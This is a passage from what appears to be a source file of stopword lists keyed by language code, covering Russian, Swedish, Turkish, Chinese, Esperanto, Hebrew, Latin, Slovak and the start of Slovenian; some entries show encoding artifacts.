        "дверь",
        "двух",
        "девятнадцатый",
        "девятнадцать",
        "девятый",
        "девять",
        "действительно",
        "дел",
        "делать",
        "дело",
        "день",
        "деньги",
        "десятый",
        "десять",
        "для",
        "до",
        "довольно",
        "долго",
        "должно",
        "должный",
        "дом",
        "дорога",
        "друг",
        "другая",
        "другие",
        "других",
        "друго",
        "другое",
        "другой",
        "думать",
        "душа",
        "е",
        "его",
        "ее",
        "ей",
        "ему",
        "если",
        "есть",
        "еще",
        "ещё",
        "ею",
        "её",
        "ж",
        "ждать",
        "же",
        "жена",
        "женщина",
        "жизнь",
        "жить",
        "за",
        "занят",
        "занята",
        "занято",
        "заняты",
        "затем",
        "зато",
        "зачем",
        "здесь",
        "земля",
        "знать",
        "значит",
        "значить",
        "и",
        "идти",
        "из",
        "или",
        "им",
        "именно",
        "иметь",
        "ими",
        "имя",
        "иногда",
        "их",
        "к",
        "каждая",
        "каждое",
        "каждые",
        "каждый",
        "кажется",
        "казаться",
        "как",
        "какая",
        "какой",
        "кем",
        "книга",
        "когда",
        "кого",
        "ком",
        "комната",
        "кому",
        "конец",
        "конечно",
        "которая",
        "которого",
        "которой",
        "которые",
        "который",
        "которых",
        "кроме",
        "кругом",
        "кто",
        "куда",
        "лежать",
        "лет",
        "ли",
        "лицо",
        "лишь",
        "лучше",
        "любить",
        "люди",
        "м",
        "маленький",
        "мало",
        "мать",
        "машина",
        "между",
        "меля",
        "менее",
        "меньше",
        "меня",
        "место",
        "миллионов",
        "мимо",
        "минута",
        "мир",
        "мира",
        "мне",
        "много",
        "многочисленная",
        "многочисленное",
        "многочисленные",
        "многочисленный",
        "мной",
        "мною",
        "мог",
        "могут",
        "мож",
        "может",
        "можно",
        "можхо",
        "мои",
        "мой",
        "мор",
        "москва",
        "мочь",
        "моя",
        "моё",
        "мы",
        "на",
        "наверху",
        "над",
        "надо",
        "назад",
        "наиболее",
        "найти",
        "наконец",
        "нам",
        "нами",
        "народ",
        "нас",
        "начала",
        "начать",
        "наш",
        "наша",
        "наше",
        "наши",
        "не",
        "него",
        "недавно",
        "недалеко",
        "нее",
        "ней",
        "некоторый",
        "нельзя",
        "нем",
        "немного",
        "нему",
        "непрерывно",
        "нередко",
        "несколько",
        "нет",
        "нею",
        "неё",
        "ни",
        "нибудь",
        "ниже",
        "низко",
        "никакой",
        "никогда",
        "никто",
        "никуда",
        "ними",
        "них",
        "ничего",
        "ничто",
        "но",
        "новый",
        "нога",
        "ночь",
        "ну",
        "нужно",
        "нужный",
        "нх",
        "о",
        "об",
        "оба",
        "обычно",
        "один",
        "одиннадцатый",
        "одиннадцать",
        "однажды",
        "однако",
        "одного",
        "одной",
        "оказаться",
        "окно",
        "около",
        "он",
        "она",
        "они",
        "оно",
        "опять",
        "особенно",
        "остаться",
        "от",
        "ответить",
        "отец",
        "отовсюду",
        "отсюда",
        "очень",
        "первый",
        "перед",
        "писать",
        "плечо",
        "по",
        "под",
        "подумать",
        "пожалуйста",
        "позже",
        "пойти",
        "пока",
        "пол",
        "получить",
        "помнить",
        "понимать",
        "понять",
        "пор",
        "пора",
        "после",
        "последний",
        "посмотреть",
        "посреди",
        "потом",
        "потому",
        "почему",
        "почти",
        "правда",
        "прекрасно",
        "при",
        "про",
        "просто",
        "против",
        "процентов",
        "пятнадцатый",
        "пятнадцать",
        "пятый",
        "пять",
        "работа",
        "работать",
        "раз",
        "разве",
        "рано",
        "раньше",
        "ребенок",
        "решить",
        "россия",
        "рука",
        "русский",
        "ряд",
        "рядом",
        "с",
        "сам",
        "сама",
        "сами",
        "самим",
        "самими",
        "самих",
        "само",
        "самого",
        "самой",
        "самом",
        "самому",
        "саму",
        "самый",
        "свет",
        "свое",
        "своего",
        "своей",
        "свои",
        "своих",
        "свой",
        "свою",
        "сделать",
        "сеаой",
        "себе",
        "себя",
        "сегодня",
        "седьмой",
        "сейчас",
        "семнадцатый",
        "семнадцать",
        "семь",
        "сидеть",
        "сила",
        "сих",
        "сказал",
        "сказала",
        "сказать",
        "сколько",
        "слишком",
        "слово",
        "случай",
        "смотреть",
        "сначала",
        "снова",
        "со",
        "собой",
        "собою",
        "советский",
        "совсем",
        "спасибо",
        "спросить",
        "сразу",
        "стал",
        "старый",
        "стать",
        "стол",
        "сторона",
        "стоять",
        "страна",
        "суть",
        "считать",
        "т",
        "та",
        "так",
        "такая",
        "также",
        "таки",
        "такие",
        "такое",
        "такой",
        "там",
        "твой",
        "твоя",
        "твоё",
        "те",
        "тебе",
        "тебя",
        "тем",
        "теми",
        "теперь",
        "тех",
        "то",
        "тобой",
        "тобою",
        "товарищ",
        "тогда",
        "того",
        "тоже",
        "только",
        "том",
        "тому",
        "тот",
        "тою",
        "третий",
        "три",
        "тринадцатый",
        "тринадцать",
        "ту",
        "туда",
        "тут",
        "ты",
        "тысяч",
        "у",
        "увидеть",
        "уж",
        "уже",
        "улица",
        "уметь",
        "утро",
        "хороший",
        "хорошо",
        "хотеть",
        "хоть",
        "хотя",
        "хочешь",
        "час",
        "часто",
        "часть",
        "чаще",
        "чего",
        "человек",
        "чем",
        "чему",
        "через",
        "четвертый",
        "четыре",
        "четырнадцатый",
        "четырнадцать",
        "что",
        "чтоб",
        "чтобы",
        "чуть",
        "шестнадцатый",
        "шестнадцать",
        "шестой",
        "шесть",
        "эта",
        "эти",
        "этим",
        "этими",
        "этих",
        "это",
        "этого",
        "этой",
        "этом",
        "этому",
        "этот",
        "эту",
        "я",
    ],
    "sv": [
        "aderton",
        "adertonde",
        "adjö",
        "aldrig",
        "alla",
        "allas",
        "allt",
        "alltid",
        "alltså",
        "andra",
        "andras",
        "annan",
        "annat",
        "artonde",
        "artonn",
        "att",
        "av",
        "bakom",
        "bara",
        "behöva",
        "behövas",
        "behövde",
        "behövt",
        "beslut",
        "beslutat",
        "beslutit",
        "bland",
        "blev",
        "bli",
        "blir",
        "blivit",
        "bort",
        "borta",
        "bra",
        "bäst",
        "bättre",
        "båda",
        "bådas",
        "dag",
        "dagar",
        "dagarna",
        "dagen",
        "de",
        "del",
        "delen",
        "dem",
        "den",
        "denna",
        "deras",
        "dess",
        "dessa",
        "det",
        "detta",
        "dig",
        "din",
        "dina",
        "dit",
        "ditt",
        "dock",
        "du",
        "där",
        "därför",
        "då",
        "efter",
        "eftersom",
        "ej",
        "elfte",
        "eller",
        "elva",
        "en",
        "enkel",
        "enkelt",
        "enkla",
        "enligt",
        "er",
        "era",
        "ert",
        "ett",
        "ettusen",
        "fanns",
        "fem",
        "femte",
        "femtio",
        "femtionde",
        "femton",
        "femtonde",
        "fick",
        "fin",
        "finnas",
        "finns",
        "fjorton",
        "fjortonde",
        "fjärde",
        "fler",
        "flera",
        "flesta",
        "fram",
        "framför",
        "från",
        "fyra",
        "fyrtio",
        "fyrtionde",
        "få",
        "får",
        "fått",
        "följande",
        "för",
        "före",
        "förlåt",
        "förra",
        "första",
        "genast",
        "genom",
        "gick",
        "gjorde",
        "gjort",
        "god",
        "goda",
        "godare",
        "godast",
        "gott",
        "gälla",
        "gäller",
        "gällt",
        "gärna",
        "gå",
        "går",
        "gått",
        "gör",
        "göra",
        "ha",
        "hade",
        "haft",
        "han",
        "hans",
        "har",
        "heller",
        "hellre",
        "helst",
        "helt",
        "henne",
        "hennes",
        "hit",
        "hon",
        "honom",
        "hundra",
        "hundraen",
        "hundraett",
        "hur",
        "här",
        "hög",
        "höger",
        "högre",
        "högst",
        "i",
        "ibland",
        "icke",
        "idag",
        "igen",
        "igår",
        "imorgon",
        "in",
        "inför",
        "inga",
        "ingen",
        "ingenting",
        "inget",
        "innan",
        "inne",
        "inom",
        "inte",
        "inuti",
        "ja",
        "jag",
        "ju",
        "jämfört",
        "kan",
        "kanske",
        "knappast",
        "kom",
        "komma",
        "kommer",
        "kommit",
        "kr",
        "kunde",
        "kunna",
        "kunnat",
        "kvar",
        "legat",
        "ligga",
        "ligger",
        "lika",
        "likställd",
        "likställda",
        "lilla",
        "lite",
        "liten",
        "litet",
        "länge",
        "längre",
        "längst",
        "lätt",
        "lättare",
        "lättast",
        "långsam",
        "långsammare",
        "långsammast",
        "långsamt",
        "långt",
        "man",
        "med",
        "mellan",
        "men",
        "mer",
        "mera",
        "mest",
        "mig",
        "min",
        "mina",
        "mindre",
        "minst",
        "mitt",
        "mittemot",
        "mot",
        "mycket",
        "många",
        "måste",
        "möjlig",
        "möjligen",
        "möjligt",
        "möjligtvis",
        "ned",
        "nederst",
        "nedersta",
        "nedre",
        "nej",
        "ner",
        "ni",
        "nio",
        "nionde",
        "nittio",
        "nittionde",
        "nitton",
        "nittonde",
        "nog",
        "noll",
        "nr",
        "nu",
        "nummer",
        "när",
        "nästa",
        "någon",
        "någonting",
        "något",
        "några",
        "nödvändig",
        "nödvändiga",
        "nödvändigt",
        "nödvändigtvis",
        "och",
        "också",
        "ofta",
        "oftast",
        "olika",
        "olikt",
        "om",
        "oss",
        "på",
        "rakt",
        "redan",
        "rätt",
        "sade",
        "sagt",
        "samma",
        "sedan",
        "senare",
        "senast",
        "sent",
        "sex",
        "sextio",
        "sextionde",
        "sexton",
        "sextonde",
        "sig",
        "sin",
        "sina",
        "sist",
        "sista",
        "siste",
        "sitt",
        "sitta",
        "sju",
        "sjunde",
        "sjuttio",
        "sjuttionde",
        "sjutton",
        "sjuttonde",
        "själv",
        "sjätte",
        "ska",
        "skall",
        "skulle",
        "slutligen",
        "små",
        "smått",
        "snart",
        "som",
        "stor",
        "stora",
        "stort",
        "större",
        "störst",
        "säga",
        "säger",
        "sämre",
        "sämst",
        "så",
        "sådan",
        "sådana",
        "sådant",
        "tack",
        "tidig",
        "tidigare",
        "tidigast",
        "tidigt",
        "till",
        "tills",
        "tillsammans",
        "tio",
        "tionde",
        "tjugo",
        "tjugoen",
        "tjugoett",
        "tjugonde",
        "tjugotre",
        "tjugotvå",
        "tjungo",
        "tolfte",
        "tolv",
        "tre",
        "tredje",
        "trettio",
        "trettionde",
        "tretton",
        "trettonde",
        "två",
        "tvåhundra",
        "under",
        "upp",
        "ur",
        "ursäkt",
        "ut",
        "utan",
        "utanför",
        "ute",
        "vad",
        "var",
        "vara",
        "varför",
        "varifrån",
        "varit",
        "varje",
        "varken",
        "vars",
        "varsågod",
        "vart",
        "vem",
        "vems",
        "verkligen",
        "vi",
        "vid",
        "vidare",
        "viktig",
        "viktigare",
        "viktigast",
        "viktigt",
        "vilka",
        "vilkas",
        "vilken",
        "vilket",
        "vill",
        "vänster",
        "vänstra",
        "värre",
        "vår",
        "våra",
        "vårt",
        "än",
        "ännu",
        "är",
        "även",
        "åt",
        "åtminstone",
        "åtta",
        "åttio",
        "åttionde",
        "åttonde",
        "över",
        "övermorgon",
        "överst",
        "övre",
    ],
    "tr": [
        "acaba",
        "acep",
        "adeta",
        "altmýþ",
        "altmış",
        "altý",
        "altı",
        "ama",
        "ancak",
        "arada",
        "artýk",
        "aslında",
        "aynen",
        "ayrıca",
        "az",
        "bana",
        "bari",
        "bazen",
        "bazý",
        "bazı",
        "baţka",
        "belki",
        "ben",
        "benden",
        "beni",
        "benim",
        "beri",
        "beþ",
        "beş",
        "beţ",
        "bile",
        "bin",
        "bir",
        "biraz",
        "biri",
        "birkaç",
        "birkez",
        "birçok",
        "birþey",
        "birþeyi",
        "birşey",
        "birşeyi",
        "birţey",
        "biz",
        "bizden",
        "bize",
        "bizi",
        "bizim",
        "bu",
        "buna",
        "bunda",
        "bundan",
        "bunlar",
        "bunları",
        "bunların",
        "bunu",
        "bunun",
        "burada",
        "böyle",
        "böylece",
        "bütün",
        "da",
        "daha",
        "dahi",
        "dahil",
        "daima",
        "dair",
        "dayanarak",
        "de",
        "defa",
        "deđil",
        "değil",
        "diye",
        "diđer",
        "diğer",
        "doksan",
        "dokuz",
        "dolayı",
        "dolayısıyla",
        "dört",
        "edecek",
        "eden",
        "ederek",
        "edilecek",
        "ediliyor",
        "edilmesi",
        "ediyor",
        "elli",
        "en",
        "etmesi",
        "etti",
        "ettiği",
        "ettiğini",
        "eđer",
        "eğer",
        "fakat",
        "gibi",
        "göre",
        "halbuki",
        "halen",
        "hangi",
        "hani",
        "hariç",
        "hatta",
        "hele",
        "hem",
        "henüz",
        "hep",
        "hepsi",
        "her",
        "herhangi",
        "herkes",
        "herkesin",
        "hiç",
        "hiçbir",
        "iken",
        "iki",
        "ila",
        "ile",
        "ilgili",
        "ilk",
        "illa",
        "ise",
        "itibaren",
        "itibariyle",
        "iyi",
        "iyice",
        "için",
        "işte",
        "iţte",
        "kadar",
        "kanýmca",
        "karşın",
        "katrilyon",
        "kendi",
        "kendilerine",
        "kendini",
        "kendisi",
        "kendisine",
        "kendisini",
        "kere",
        "kez",
        "keţke",
        "ki",
        "kim",
        "kimden",
        "kime",
        "kimi",
        "kimse",
        "kýrk",
        "kýsaca",
        "kırk",
        "lakin",
        "madem",
        "međer",
        "milyar",
        "milyon",
        "mu",
        "mü",
        "mý",
        "mı",
        "nasýl",
        "nasıl",
        "ne",
        "neden",
        "nedenle",
        "nerde",
        "nere",
        "nerede",
        "nereye",
        "nitekim",
        "niye",
        "niçin",
        "o",
        "olan",
        "olarak",
        "oldu",
        "olduklarını",
        "olduğu",
        "olduğunu",
        "olmadı",
        "olmadığı",
        "olmak",
        "olması",
        "olmayan",
        "olmaz",
        "olsa",
        "olsun",
        "olup",
        "olur",
        "olursa",
        "oluyor",
        "on",
        "ona",
        "ondan",
        "onlar",
        "onlardan",
        "onlari",
        "onlarýn",
        "onları",
        "onların",
        "onu",
        "onun",
        "otuz",
        "oysa",
        "pek",
        "rağmen",
        "sadece",
        "sanki",
        "sekiz",
        "seksen",
        "sen",
        "senden",
        "seni",
        "senin",
        "siz",
        "sizden",
        "sizi",
        "sizin",
        "sonra",
        "tarafından",
        "trilyon",
        "tüm",
        "var",
        "vardı",
        "ve",
        "veya",
        "veyahut",
        "ya",
        "yahut",
        "yani",
        "yapacak",
        "yapmak",
        "yaptı",
        "yaptıkları",
        "yaptığı",
        "yaptığını",
        "yapılan",
        "yapılması",
        "yapıyor",
        "yedi",
        "yerine",
        "yetmiþ",
        "yetmiş",
        "yetmiţ",
        "yine",
        "yirmi",
        "yoksa",
        "yüz",
        "zaten",
        "çok",
        "çünkü",
        "öyle",
        "üzere",
        "üç",
        "þey",
        "þeyden",
        "þeyi",
        "þeyler",
        "þu",
        "þuna",
        "þunda",
        "þundan",
        "þunu",
        "şey",
        "şeyden",
        "şeyi",
        "şeyler",
        "şu",
        "şuna",
        "şunda",
        "şundan",
        "şunları",
        "şunu",
        "şöyle",
        "ţayet",
        "ţimdi",
        "ţu",
        "ţöyle",
    ],
    "zh": [
        "、",
        "。",
        "〈",
        "〉",
        "《",
        "》",
        "一",
        "一切",
        "一则",
        "一方面",
        "一旦",
        "一来",
        "一样",
        "一般",
        "七",
        "万一",
        "三",
        "上下",
        "不仅",
        "不但",
        "不光",
        "不单",
        "不只",
        "不如",
        "不怕",
        "不惟",
        "不成",
        "不拘",
        "不比",
        "不然",
        "不特",
        "不独",
        "不管",
        "不论",
        "不过",
        "不问",
        "与",
        "与其",
        "与否",
        "与此同时",
        "且",
        "两者",
        "个",
        "临",
        "为",
        "为了",
        "为什么",
        "为何",
        "为着",
        "乃",
        "乃至",
        "么",
        "之",
        "之一",
        "之所以",
        "之类",
        "乌乎",
        "乎",
        "乘",
        "九",
        "也",
        "也好",
        "也罢",
        "了",
        "二",
        "于",
        "于是",
        "于是乎",
        "云云",
        "五",
        "人家",
        "什么",
        "什么样",
        "从",
        "从而",
        "他",
        "他人",
        "他们",
        "以",
        "以便",
        "以免",
        "以及",
        "以至",
        "以至于",
        "以致",
        "们",
        "任",
        "任何",
        "任凭",
        "似的",
        "但",
        "但是",
        "何",
        "何况",
        "何处",
        "何时",
        "作为",
        "你",
        "你们",
        "使得",
        "例如",
        "依",
        "依照",
        "俺",
        "俺们",
        "倘",
        "倘使",
        "倘或",
        "倘然",
        "倘若",
        "借",
        "假使",
        "假如",
        "假若",
        "像",
        "八",
        "六",
        "兮",
        "关于",
        "其",
        "其一",
        "其中",
        "其二",
        "其他",
        "其余",
        "其它",
        "其次",
        "具体地说",
        "具体说来",
        "再者",
        "再说",
        "冒",
        "冲",
        "况且",
        "几",
        "几时",
        "凭",
        "凭借",
        "则",
        "别",
        "别的",
        "别说",
        "到",
        "前后",
        "前者",
        "加之",
        "即",
        "即令",
        "即使",
        "即便",
        "即或",
        "即若",
        "又",
        "及",
        "及其",
        "及至",
        "反之",
        "反过来",
        "反过来说",
        "另",
        "另一方面",
        "另外",
        "只是",
        "只有",
        "只要",
        "只限",
        "叫",
        "叮咚",
        "可",
        "可以",
        "可是",
        "可见",
        "各",
        "各个",
        "各位",
        "各种",
        "各自",
        "同",
        "同时",
        "向",
        "向着",
        "吓",
        "吗",
        "否则",
        "吧",
        "吧哒",
        "吱",
        "呀",
        "呃",
        "呕",
        "呗",
        "呜",
        "呜呼",
        "呢",
        "呵",
        "呸",
        "呼哧",
        "咋",
        "和",
        "咚",
        "咦",
        "咱",
        "咱们",
        "咳",
        "哇",
        "哈",
        "哈哈",
        "哉",
        "哎",
        "哎呀",
        "哎哟",
        "哗",
        "哟",
        "哦",
        "哩",
        "哪",
        "哪个",
        "哪些",
        "哪儿",
        "哪天",
        "哪年",
        "哪怕",
        "哪样",
        "哪边",
        "哪里",
        "哼",
        "哼唷",
        "唉",
        "啊",
        "啐",
        "啥",
        "啦",
        "啪达",
        "喂",
        "喏",
        "喔唷",
        "嗡嗡",
        "嗬",
        "嗯",
        "嗳",
        "嘎",
        "嘎登",
        "嘘",
        "嘛",
        "嘻",
        "嘿",
        "四",
        "因",
        "因为",
        "因此",
        "因而",
        "固然",
        "在",
        "在下",
        "地",
        "多",
        "多少",
        "她",
        "她们",
        "如",
        "如上所述",
        "如何",
        "如其",
        "如果",
        "如此",
        "如若",
        "宁",
        "宁可",
        "宁愿",
        "宁肯",
        "它",
        "它们",
        "对",
        "对于",
        "将",
        "尔后",
        "尚且",
        "就",
        "就是",
        "就是说",
        "尽",
        "尽管",
        "岂但",
        "己",
        "并",
        "并且",
        "开外",
        "开始",
        "归",
        "当",
        "当着",
        "彼",
        "彼此",
        "往",
        "待",
        "得",
        "怎",
        "怎么",
        "怎么办",
        "怎么样",
        "怎样",
        "总之",
        "总的来看",
        "总的来说",
        "总的说来",
        "总而言之",
        "恰恰相反",
        "您",
        "慢说",
        "我",
        "我们",
        "或",
        "或是",
        "或者",
        "所",
        "所以",
        "打",
        "把",
        "抑或",
        "拿",
        "按",
        "按照",
        "换句话说",
        "换言之",
        "据",
        "接着",
        "故",
        "故此",
        "旁人",
        "无宁",
        "无论",
        "既",
        "既是",
        "既然",
        "时候",
        "是",
        "是的",
        "替",
        "有",
        "有些",
        "有关",
        "有的",
        "望",
        "朝",
        "朝着",
        "本",
        "本着",
        "来",
        "来着",
        "极了",
        "果然",
        "果真",
        "某",
        "某个",
        "某些",
        "根据",
        "正如",
        "此",
        "此外",
        "此间",
        "毋宁",
        "每",
        "每当",
        "比",
        "比如",
        "比方",
        "沿",
        "沿着",
        "漫说",
        "焉",
        "然则",
        "然后",
        "然而",
        "照",
        "照着",
        "甚么",
        "甚而",
        "甚至",
        "用",
        "由",
        "由于",
        "由此可见",
        "的",
        "的话",
        "相对而言",
        "省得",
        "着",
        "着呢",
        "矣",
        "离",
        "第",
        "等",
        "等等",
        "管",
        "紧接着",
        "纵",
        "纵令",
        "纵使",
        "纵然",
        "经",
        "经过",
        "结果",
        "给",
        "继而",
        "综上所述",
        "罢了",
        "者",
        "而",
        "而且",
        "而况",
        "而外",
        "而已",
        "而是",
        "而言",
        "能",
        "腾",
        "自",
        "自个儿",
        "自从",
        "自各儿",
        "自家",
        "自己",
        "自身",
        "至",
        "至于",
        "若",
        "若是",
        "若非",
        "莫若",
        "虽",
        "虽则",
        "虽然",
        "虽说",
        "被",
        "要",
        "要不",
        "要不是",
        "要不然",
        "要么",
        "要是",
        "让",
        "论",
        "设使",
        "设若",
        "该",
        "诸位",
        "谁",
        "谁知",
        "赶",
        "起",
        "起见",
        "趁",
        "趁着",
        "越是",
        "跟",
        "较",
        "较之",
        "边",
        "过",
        "还是",
        "还有",
        "这",
        "这个",
        "这么",
        "这么些",
        "这么样",
        "这么点儿",
        "这些",
        "这会儿",
        "这儿",
        "这就是说",
        "这时",
        "这样",
        "这边",
        "这里",
        "进而",
        "连",
        "连同",
        "通过",
        "遵照",
        "那",
        "那个",
        "那么",
        "那么些",
        "那么样",
        "那些",
        "那会儿",
        "那儿",
        "那时",
        "那样",
        "那边",
        "那里",
        "鄙人",
        "鉴于",
        "阿",
        "除",
        "除了",
        "除此之外",
        "除非",
        "随",
        "随着",
        "零",
        "非但",
        "非徒",
        "靠",
        "顺",
        "顺着",
        "首先",
        "︿",
        "！",
        "＃",
        "＄",
        "％",
        "＆",
        "（",
        "）",
        "＊",
        "＋",
        "，",
        "０",
        "１",
        "２",
        "３",
        "４",
        "５",
        "６",
        "７",
        "８",
        "９",
        "：",
        "；",
        "＜",
        "＞",
        "？",
        "＠",
        "［",
        "］",
        "｛",
        "｜",
        "｝",
        "～",
        "￥",
    ],
    "eo": [
        "adiaŭ",
        "ajn",
        "al",
        "ankoraŭ",
        "antaŭ",
        "aŭ",
        "bonan",
        "bonvole",
        "bonvolu",
        "bv",
        "ci",
        "cia",
        "cian",
        "cin",
        "d-ro",
        "da",
        "de",
        "dek",
        "deka",
        "do",
        "doktor'",
        "doktoro",
        "du",
        "dua",
        "dum",
        "eble",
        "ekz",
        "ekzemple",
        "en",
        "estas",
        "estis",
        "estos",
        "estu",
        "estus",
        "eĉ",
        "f-no",
        "feliĉan",
        "for",
        "fraŭlino",
        "ha",
        "havas",
        "havis",
        "havos",
        "havu",
        "havus",
        "he",
        "ho",
        "hu",
        "ili",
        "ilia",
        "ilian",
        "ilin",
        "inter",
        "io",
        "ion",
        "iu",
        "iujn",
        "iun",
        "ja",
        "jam",
        "je",
        "jes",
        "k",
        "kaj",
        "ke",
        "kio",
        "kion",
        "kiu",
        "kiujn",
        "kiun",
        "kvankam",
        "kvar",
        "kvara",
        "kvazaŭ",
        "kvin",
        "kvina",
        "la",
        "li",
        "lia",
        "lian",
        "lin",
        "malantaŭ",
        "male",
        "malgraŭ",
        "mem",
        "mi",
        "mia",
        "mian",
        "min",
        "minus",
        "naŭ",
        "naŭa",
        "ne",
        "nek",
        "nenio",
        "nenion",
        "neniu",
        "neniun",
        "nepre",
        "ni",
        "nia",
        "nian",
        "nin",
        "nu",
        "nun",
        "nur",
        "ok",
        "oka",
        "oni",
        "onia",
        "onian",
        "onin",
        "plej",
        "pli",
        "plu",
        "plus",
        "por",
        "post",
        "preter",
        "s-no",
        "s-ro",
        "se",
        "sed",
        "sep",
        "sepa",
        "ses",
        "sesa",
        "si",
        "sia",
        "sian",
        "sin",
        "sinjor'",
        "sinjorino",
        "sinjoro",
        "sub",
        "super",
        "supren",
        "sur",
        "tamen",
        "tio",
        "tion",
        "tiu",
        "tiujn",
        "tiun",
        "tra",
        "tri",
        "tria",
        "tuj",
        "tute",
        "unu",
        "unua",
        "ve",
        "verŝajne",
        "vi",
        "via",
        "vian",
        "vin",
        "ĉi",
        "ĉio",
        "ĉion",
        "ĉiu",
        "ĉiujn",
        "ĉiun",
        "ĉu",
        "ĝi",
        "ĝia",
        "ĝian",
        "ĝin",
        "ĝis",
        "ĵus",
        "ŝi",
        "ŝia",
        "ŝin",
    ],
    "he": [
        "אבל",
        "או",
        "אולי",
        "אותה",
        "אותו",
        "אותי",
        "אותך",
        "אותם",
        "אותן",
        "אותנו",
        "אז",
        "אחר",
        "אחרות",
        "אחרי",
        "אחריכן",
        "אחרים",
        "אחרת",
        "אי",
        "איזה",
        "איך",
        "אין",
        "איפה",
        "איתה",
        "איתו",
        "איתי",
        "איתך",
        "איתכם",
        "איתכן",
        "איתם",
        "איתן",
        "איתנו",
        "אך",
        "אל",
        "אלה",
        "אלו",
        "אם",
        "אנחנו",
        "אני",
        "אס",
        "אף",
        "אצל",
        "אשר",
        "את",
        "אתה",
        "אתכם",
        "אתכן",
        "אתם",
        "אתן",
        "באיזומידה",
        "באמצע",
        "באמצעות",
        "בגלל",
        "בין",
        "בלי",
        "במידה",
        "במקוםשבו",
        "ברם",
        "בשביל",
        "בשעהש",
        "בתוך",
        "גם",
        "דרך",
        "הוא",
        "היא",
        "היה",
        "היכן",
        "היתה",
        "היתי",
        "הם",
        "הן",
        "הנה",
        "הסיבהשבגללה",
        "הרי",
        "ואילו",
        "ואת",
        "זאת",
        "זה",
        "זות",
        "יהיה",
        "יוכל",
        "יוכלו",
        "יותרמדי",
        "יכול",
        "יכולה",
        "יכולות",
        "יכולים",
        "יכל",
        "יכלה",
        "יכלו",
        "יש",
        "כאן",
        "כאשר",
        "כולם",
        "כולן",
        "כזה",
        "כי",
        "כיצד",
        "כך",
        "ככה",
        "כל",
        "כלל",
        "כמו",
        "כן",
        "כפי",
        "כש",
        "לא",
        "לאו",
        "לאיזותכלית",
        "לאן",
        "לבין",
        "לה",
        "להיות",
        "להם",
        "להן",
        "לו",
        "לי",
        "לכם",
        "לכן",
        "למה",
        "למטה",
        "למעלה",
        "למקוםשבו",
        "למרות",
        "לנו",
        "לעבר",
        "לעיכן",
        "לפיכך",
        "לפני",
        "מאד",
        "מאחורי",
        "מאיזוסיבה",
        "מאין",
        "מאיפה",
        "מבלי",
        "מבעד",
        "מדוע",
        "מה",
        "מהיכן",
        "מול",
        "מחוץ",
        "מי",
        "מכאן",
        "מכיוון",
        "מלבד",
        "מן",
        "מנין",
        "מסוגל",
        "מעט",
        "מעטים",
        "מעל",
        "מצד",
        "מקוםבו",
        "מתחת",
        "מתי",
        "נגד",
        "נגר",
        "נו",
        "עד",
        "עז",
        "על",
        "עלי",
        "עליה",
        "עליהם",
        "עליהן",
        "עליו",
        "עליך",
        "עליכם",
        "עלינו",
        "עם",
        "עצמה",
        "עצמהם",
        "עצמהן",
        "עצמו",
        "עצמי",
        "עצמם",
        "עצמן",
        "עצמנו",
        "פה",
        "רק",
        "שוב",
        "של",
        "שלה",
        "שלהם",
        "שלהן",
        "שלו",
        "שלי",
        "שלך",
        "שלכה",
        "שלכם",
        "שלכן",
        "שלנו",
        "שם",
        "תהיה",
        "תחת",
    ],
    "la": [
        "a",
        "ab",
        "ac",
        "ad",
        "at",
        "atque",
        "aut",
        "autem",
        "cum",
        "de",
        "dum",
        "e",
        "erant",
        "erat",
        "est",
        "et",
        "etiam",
        "ex",
        "haec",
        "hic",
        "hoc",
        "in",
        "ita",
        "me",
        "nec",
        "neque",
        "non",
        "per",
        "qua",
        "quae",
        "quam",
        "qui",
        "quibus",
        "quidem",
        "quo",
        "quod",
        "re",
        "rebus",
        "rem",
        "res",
        "sed",
        "si",
        "sic",
        "sunt",
        "tamen",
        "tandem",
        "te",
        "ut",
        "vel",
    ],
    "sk": [
        "a",
        "aby",
        "aj",
        "ako",
        "aký",
        "ale",
        "alebo",
        "ani",
        "avšak",
        "ba",
        "bez",
        "buï",
        "cez",
        "do",
        "ho",
        "hoci",
        "i",
        "ich",
        "im",
        "ja",
        "jeho",
        "jej",
        "jemu",
        "ju",
        "k",
        "kam",
        "kde",
        "kedže",
        "keï",
        "kto",
        "ktorý",
        "ku",
        "lebo",
        "ma",
        "mi",
        "mne",
        "mnou",
        "mu",
        "my",
        "mòa",
        "môj",
        "na",
        "nad",
        "nami",
        "neho",
        "nej",
        "nemu",
        "nich",
        "nielen",
        "nim",
        "no",
        "nám",
        "nás",
        "náš",
        "ním",
        "o",
        "od",
        "on",
        "ona",
        "oni",
        "ono",
        "ony",
        "po",
        "pod",
        "pre",
        "pred",
        "pri",
        "s",
        "sa",
        "seba",
        "sem",
        "so",
        "svoj",
        "taký",
        "tam",
        "teba",
        "tebe",
        "tebou",
        "tej",
        "ten",
        "ti",
        "tie",
        "to",
        "toho",
        "tomu",
        "tou",
        "tvoj",
        "ty",
        "tá",
        "tým",
        "v",
        "vami",
        "veï",
        "vo",
        "vy",
        "vám",
        "vás",
        "váš",
        "však",
        "z",
        "za",
        "zo",
        "a",
        "èi",
        "èo",
        "èí",
        "òom",
        "òou",
        "òu",
        "že",
    ],
    "sl": [
        "a",
        "ali",
        "april",
        "avgust",
        "b",
        "bi",
        "bil",
        "bila",
        "bile",
        "bili",
        "bilo",
        "biti",
        "blizu",
        "bo",
        "bodo",
        "bojo",
        "bolj",
        "bom",
        "bomo",
        "boste",
        "bova",
        "boš",
        "brez",
        "c",
        "cel",
        "cela",
        "celi",
        "celo",
        "d",
        "da",
        "daleč",
        "dan",
        "danes",
        "datum",
        "december",
        "deset",
        "deseta",
        "deseti",
        "deseto",
        "devet",
        "deveta",
        "deveti",
        "deveto",
        "do",
        "dober",
        "dobra",
        "dobri",
        "dobro",
        "dokler",
        "dol",
        "dolg",
        "dolga",
        "dolgi",
        "dovolj",
        "drug",
        "druga",
        "drugi",
        "drugo",
        "dva",
        "dve",
        "e",
        "eden",
        "en",
        "ena",
        "ene",
        "eni",
        "enkrat",
        "eno",
        "etc.",
        "f",
        "februar",
        "g",
        "g.",
        "ga",
        "ga.",
        "gor",
        "gospa",
        "gospod",
        "h",
        "halo",
        "i",
        "idr.",
        "ii",
        "iii",
        "in",
        "iv",
        "ix",
        "iz",
        "j",
        "januar",
        "jaz",
        "je",
        "ji",
        "jih",
        "jim",
        "jo",
        "julij",
        "junij",
        "jutri",
        "k",
        "kadarkoli",
        "kaj",
        "kajti",
        "kako",
        "kakor",
        "kamor",
        "kamorkoli",
        "kar",
        "karkoli",
        "katerikoli",
        "kdaj",
        "kdo",
        "kdorkoli",
        "ker",
        "ki",
        "kje",
        "kjer",
        "kjerkoli",
